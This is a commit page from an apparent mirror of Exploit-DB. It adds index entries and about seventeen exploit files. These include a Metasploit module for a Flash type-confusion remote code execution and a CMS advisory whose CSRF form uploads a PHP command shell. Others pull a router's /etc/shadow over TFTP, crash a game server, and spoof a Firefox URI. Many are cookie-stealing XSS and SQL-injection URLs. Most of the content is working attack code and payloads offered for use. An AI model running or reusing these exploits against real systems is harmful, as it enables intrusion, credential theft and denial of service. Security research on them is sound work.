bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 05_01_2014

Browse source
This commit is contained in:
Offensive Security 2014-05-01 04:36:00 +00:00
parent 7ff338dd75
commit 81f4c480be
18 changed files with 529 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
files.csv
View file

@ -29824,3 +29824,20 @@ id,file,description,date,author,platform,type,port
33086,platforms/multiple/dos/33086.txt,"America's Army 3.0.4 Invalid Query Remote Denial of Service Vulnerability",2009-06-06,"Luigi Auriemma",multiple,dos,0
33087,platforms/php/webapps/33087.txt,"PHPLive! 3.2.2 'request.php' SQL Injection Vulnerability",2009-06-16,boom3rang,php,webapps,0
33089,platforms/windows/remote/33089.pl,"iDefense COMRaider ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0
33090,platforms/hardware/webapps/33090.txt,"TRENDnet TEW-634GRU 1.00.23 - Multiple Vulnerabilities",2014-04-29,SirGod,hardware,webapps,69
33091,platforms/php/webapps/33091.txt,"NULL NUKE CMS 2.2 - Multiple Vulnerabilities",2014-04-29,LiquidWorm,php,webapps,80
33095,platforms/windows/remote/33095.rb,"Adobe Flash Player Type Confusion Remote Code Execution",2014-04-29,metasploit,windows,remote,0
33096,platforms/multiple/dos/33096.txt,"Crysis 1.21/1.5 HTTP/XML-RPC Service Access Violation Remote Denial of Service Vulnerability",2009-06-20,"Luigi Auriemma",multiple,dos,0
33097,platforms/php/webapps/33097.txt,"Programs Rating rate.php id Parameter XSS",2009-06-20,Moudi,php,webapps,0
33098,platforms/php/webapps/33098.txt,"Programs Rating postcomments.php id Parameter XSS",2009-06-20,Moudi,php,webapps,0
33102,platforms/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 Web Mail URI Parsing HTML Injection Vulnerability",2009-06-23,"Andrea Purificato",php,webapps,0
33103,platforms/linux/remote/33103.html,"Mozilla Firefox <= 3.5.1 Error Page Address Bar URI Spoofing Vulnerability",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0
33106,platforms/php/webapps/33106.txt,"PG MatchMaking browse_ladies.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0
33107,platforms/php/webapps/33107.txt,"PG MatchMaking browse_men.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0
33108,platforms/php/webapps/33108.txt,"PG MatchMaking search.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0
33109,platforms/php/webapps/33109.txt,"PG MatchMaking services.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0
33110,platforms/php/webapps/33110.txt,"XZeroScripts XZero Community Classifieds 4.97.8 Multiple Cross Site Scripting Vulnerabilities",2009-06-24,Moudi,php,webapps,0
33111,platforms/php/webapps/33111.txt,"AIOCP 1.4 'cp_html2txt.php' Remote File Include Vulnerability",2009-06-27,"Hadi Kiamarsi",php,webapps,0
33112,platforms/php/webapps/33112.txt,"PG Roommate Finder Solution quick_search.php part Parameter XSS",2009-06-27,Moudi,php,webapps,0
33113,platforms/php/webapps/33113.txt,"PG Roommate Finder Solution viewprofile.php part Parameter XSS",2009-06-27,Moudi,php,webapps,0
33114,platforms/php/webapps/33114.txt,"Almond Classifieds Component for Joomla! 7.5 Cross-Site Scripting and SQL-Injection Vulnerabilities",2009-06-27,Moudi,php,webapps,0

Can't render this file because it is too large.

90
platforms/hardware/webapps/33090.txt Executable file
View file

@ -0,0 +1,90 @@
# Title: TRENDnet TEW-634GRU 1.00.23 Multiple Vulnerabilities
# Author: SirGod
# Website: www.rstforums.com
# Vendor Homepage: http://www.trendnet.com/
# Version: 1.00.23
1. Local file disclosure
The router has the TFTP service enabled by default and it can be accessed without any prior authentication (since TFTP does not support authentication). The whole filesystem is exposed to any person that is connected to the network.
Proof of concept:
sirgod@linuxbox:~$ tftp 192.168.10.1
tftp> get
(files) /etc/shadow
Received 357 bytes in 0.3 seconds
tftp> quit
sirgod@linuxbox:~$ cat shadow
root::10933:0:99999:7:::
Admin:[REMOVED]:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::
2. Local router crash
If you upload a file to the router, it will crash. You will have to reset it (physically) and reconfigure it. After the file is uploaded, accessing the router's IP will give you a blank page and then it will crash.
Proof of concept:
sirgod@linuxbox:~$ tftp 192.168.10.1
tftp> put
(file) /home/file.txt /www/file.txt
3. Privilege escalation
The web app incorporates two types of login: user and admin. Few actions (load settings, reset settings) require an admin account to perform them. The validation is done client-side, in JavaScript. See the following code snippet:
settings.asp
--- START CODE SNIPPET ---
function check_load_settings(){
var login_who="user";
if(login_who== "user"){
window.location.href ="back.asp";
}else{
if(confirm(msg[MSG17])){
if (get_by_id("file").value == ''){
alert(msg[MSG33]);
}else{
send_submit("form1");
}
}
}
}
function check_restore_default(){
var login_who="user";
if(login_who== "user"){
window.location.href ="back.asp";
}else{
if(confirm(msg[MSG34])){
send_submit("form2");
}
}
}
--- END CODE SNIPPET ---
There are two ways to bypass this:
a) The easy way: submit the form from the JavaScript console, directly from your browser, by running:
send_submit("form2"); // To restore factory default settings
send_submit("form3"); // To restore configuration settings (existent). You must select a file beforehand.
b) The other way: You can save the page locally, change the value of the variable and run it.

9
platforms/linux/remote/33103.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35803/info
Mozilla Firefox is affected by a URI-spoofing vulnerability.
An attacker may leverage this issue by inserting arbitrary content to spoof a URI presented to an unsuspecting user. This may lead to a false sense of trust because the victim may be presented with a URI of a seemingly trusted site while interacting with the attacker's malicious site.
This issue affects Firefox versions prior to 3.5.2 and 3.0.13.
</script> <center> <h1>Firefox spoofing</h1> </center> <p> <a href="javascript:spoof()">test!</a> <p> <script> function spoof() { a = window.open("http://www.example.com%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,") a.document.write("<H1>FAKE PAGE<\h1>") a.document.write("<title>test</title>") a.stop (); } </script> <br> Juan Pablo Lopez Yacubian

18
platforms/multiple/dos/33096.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/35735/info
Crysis is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.
An attacker can exploit this issue to crash the affected application, denying further service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
The following are affected:
Crysis 1.21 and prior versions
Crysis Wars 1.5 and prior versions
POST /rpc2 HTTP/1.1
Content-Length: 90
<?xml version="1.0"?>
<methodCall>
<methodName>challenge</methodName>
</methodCall>

165
platforms/php/webapps/33091.txt Executable file
View file

@ -0,0 +1,165 @@
?
NULL NUKE CMS v2.2 Multiple Vulnerabilities
Vendor: nullwanton
Product web page: http://sourceforge.net/projects/nullnuke/
Affected version: 2.2 and 2.1 rc3
Summary: NULL-8x3-NUKE is a fast, powerful and secure cross platform CMS
for windows and Linux using base or full drive paths.
Desc: NULL NUKE CMS suffers from multiple remote vulnerabilities including
Stored/Reflected XSS, SQL Injection, Arbitrary File Upload, RCE, Arbitrary
File Deletion, Arbitrary File Access using absolute path and/or traversal,
Open Redirection, Parameter Traversal, and Cross-Site Request Forgery.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5185
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5185.php
13.04.2014
---
-------------------------------------
[*] SQL Injection, CSRF (msgid param)
-------------------------------------
http://localhost/nullnuke/msgbox.php?nxt=readmsg&view=1&msgid=7%27
----------------------------------------
[*] Stored XSS, CSRF (faqcattitle param)
----------------------------------------
<html><body>
<form action="http://localhost/nullnuke22/admin.php?fct=faq&nxt=FaqCatAdd" method="POST">
<input type="hidden" name="faqcattitle" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Execute!" />
</form>
</body></html>
-----------------------------------------------------------------------------------------
[*] Arbitrary File Upload at arbitrary location, CSRF, RCE (fupload[1], uploadpath param)
-----------------------------------------------------------------------------------------
POST /nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------117202350024276
Content-Length: 786
-----------------------------117202350024276
Content-Disposition: form-data; name="fupload[1]"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------117202350024276
Content-Disposition: form-data; name="uploadpath"
C:/xampp/htdocs/nullnuke22/
-----------------------------117202350024276
Content-Disposition: form-data; name="_numfeilds"
1
-----------------------------117202350024276
Content-Disposition: form-data; name="uploadform"
Upload
-----------------------------117202350024276
Content-Disposition: form-data; name="unpack_archive"
0
-----------------------------117202350024276
Content-Disposition: form-data; name="addfeild"
1
-----------------------------117202350024276--
--
<html><body>
<form action="http://localhost/nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here" method="POST" enctype="multipart/form-data">
<input type="hidden" name="fupload[1]" value="<?php passthru($_GET['cmd']); ?>" />
<input type="hidden" name="uploadpath" value="C:/xampp/htdocs/nullnuke22/" />
<input type="hidden" name="_numfeilds" value="1" />
<input type="hidden" name="uploadform" value="Upload" />
<input type="hidden" name="unpack_archive" value="0" />
<input type="hidden" name="addfeild" value="1" />
<input type="submit" value="Execute!" />
</form>
</body></html>
---------------------------------------------------
[*] Arbitrary File Deletion, CSRF (dfarray[] param)
---------------------------------------------------
<html><body>
<form action="http://localhost/nullnuke2/admin.php?fct=file_types&nxt=fileSystem" method="POST">
<input type="hidden" name="delfile" value="Delete" />
<input type="hidden" name="dfarray[]" value="C:/secret_secrets.txt" />
<input type="submit" value="Execute!" />
</form>
</body></html>
-------------------------------------------------------------------------------------------
[*] Arbitrary File Read using absolute path, CSRF (file param, value needs to be in base64)
-------------------------------------------------------------------------------------------
http://localhost/nullnuke22/admin.php?fct=file_types&nxt=getfile&path=&file=QzpcdGVzdC50eHQ=
- QzpcdGVzdC50eHQ= (C:\test.txt)
-------------------------------------------
[*] Open Redirect, CSRF (redirectlgn param)
-------------------------------------------
<html><body>
<form action="http://localhost/nullnuke22/login.php?nxt=chklogin" method="POST">
<input type="hidden" name="uname" value="admin" />
<input type="hidden" name="pass" value="admin" />
<input type="hidden" name="remlogin" value="0" />
<input type="hidden" name="redirectlgn" value="http://www.zeroscience.mk" />
<input type="hidden" name="stripit_form" value="uname|pass" />
<input type="hidden" name="mpn_sectype" value="1" />
<input type="submit" value="Execute!" />
</form>
</body></html>
-----------------------------------------------------------------
[*] Reflected XSS, CSRF (upload param, Referer HTTP Header field)
-----------------------------------------------------------------
http://localhost/nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here1f454"><script>alert(1);</script>6747f198ae5
--
GET /nullnuke22/login.php?nxt=chklogin&uname=admin&pass=admin&remlogin=0&redirectlgn=http%3A%2F%2Flocalhost%2Fnullnuke22%2Fadmin.php%3Ffct%3Dfile_types%26nxt%3DfileSystem%26upload%3Dhere&stripit_form=uname%7Cpass&mpn_sectype=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=b55ec"><script>alert(document.cookie);</script>bb8d1b11bd9304d5f
Connection: keep-alive

7
platforms/php/webapps/33097.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/35746/info
Programs Rating Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/rating/rate.php?id=1>'><ScRiPt %0A%0D>alert(355414516481)%3B</ScRiPt>

7
platforms/php/webapps/33098.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/35746/info
Programs Rating Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/rating/postcomments.php?id=1>'><ScRiPt %0A%0D>alert(360824593944)%3B</ScRiPt>

9
platforms/php/webapps/33102.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35783/info
CommuniGate Pro is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to run HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
Versions prior to CommuniGate Pro 5.2.15 are vulnerable.
http://www.example.com/&z="><script>alert(document.cookie)</script>&f=

7
platforms/php/webapps/33106.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/35808/info
PG Matchmaking is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/browse_ladies.php?show="><script>alert(document.cookie);</script>

7
platforms/php/webapps/33107.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/35808/info
PG Matchmaking is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/browse_men.php?show="><script>alert(document.cookie);</script>

7
platforms/php/webapps/33108.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/35808/info
PG Matchmaking is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/search.php?search=SEARCH&gender="><script>alert(document.cookie);</script>

7
platforms/php/webapps/33109.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/35808/info
PG Matchmaking is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/services.php?id="><script>alert(document.cookie);</script>

10
platforms/php/webapps/33110.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/35809/info
XZeroScripts XZero Community Classifieds is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The issues affect XZeroScripts XZero Community Classifieds 4.97.8; other versions may also be vulnerable.
http://www.example.com/xzero_classifieds/?_xzcal_m=6&_xzcal_y=1<body+onload=alert(318724525577)>
http://www.example.com/xzero_classifieds/index.php?cityid=1777&view=post&postevent=1"+onmouseover=alert(390684711834)+

9
platforms/php/webapps/33111.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35811/info
AIOCP (All In One Control Panel) is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the computer; other attacks are also possible.
AIOCP 1.4.001 is vulnerable; other versions may also be affected.
http://www.example.com/public/code/cp_html2txt.php?page=[SHELL]

7
platforms/php/webapps/33112.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/35814/info
PG Roommate Finder Solution is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/roommate/demo/quick_search.php?part="><script>alert(document.cookie);</script>

7
platforms/php/webapps/33113.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/35814/info
PG Roommate Finder Solution is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/roommate/demo/viewprofile.php?part="><script>alert(document.cookie);</script>

15
platforms/php/webapps/33114.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/35815/info
Almond Classifieds Component for Joomla! is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Almond Classifieds Component for Joomla! 7.5 is vulnerable; other versions may also be affected.
http://www.example.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]
http://www.example.com/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=1 <= TRUE
http://www.example.com/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=2 <= FALSE
http://www.example.com/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5 => TRUE
http://www.example.com/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5 => FALSE
http://www.example.com/patch/components/com_aclassf/gmap.php?addr=[XSS]
http://www.example.com/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>

131
platforms/windows/remote/33095.rb Executable file
View file

@ -0,0 +1,131 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player Type Confusion Remote Code Execution",
'Description' => %q{
This module exploits a type confusion vulnerability found in the ActiveX
component of Adobe Flash Player. This vulnerability was found exploited
in the wild in November 2013. This module has been tested successfully
on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170
over Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery and exploit in the wild
'bannedit', # Exploit in the wild discoverer, analysis and reporting
'juan vazquez' # msf module
],
'References' =>
[
[ 'CVE', '2013-5331' ],
[ 'OSVDB', '100774'],
[ 'BID', '64199'],
[ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb13-28.html' ],
[ 'URL', 'http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html' ]
],
'Payload' =>
{
'Space' => 2000,
'DisableNops' => true,
'PrependEncoder' => stack_adjust
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'Retries' => false,
'EXITFUNC' => "thread"
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
:method => "LoadMovie",
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^11\.[7|8|9]/ && ver < '11.9.900.170' }
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Dec 10 2013",
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def stack_adjust
adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb
adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
adjust
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
return
end
print_status("Sending HTML...")
tag = retrieve_tag(cli, request)
profile = get_profile(tag)
profile[:tried] = false unless profile.nil? # to allow request the swf
print_status("showme the money")
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
flash_payload = ""
get_payload(cli,target_info).unpack("V*").each do |i|
flash_payload << "0x#{i.to_s(16)},"
end
flash_payload.gsub!(/,$/, "")
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=flash_payload%>" />
<param name="Play" value="true" />
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-5331", "Exploit.swf" )
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end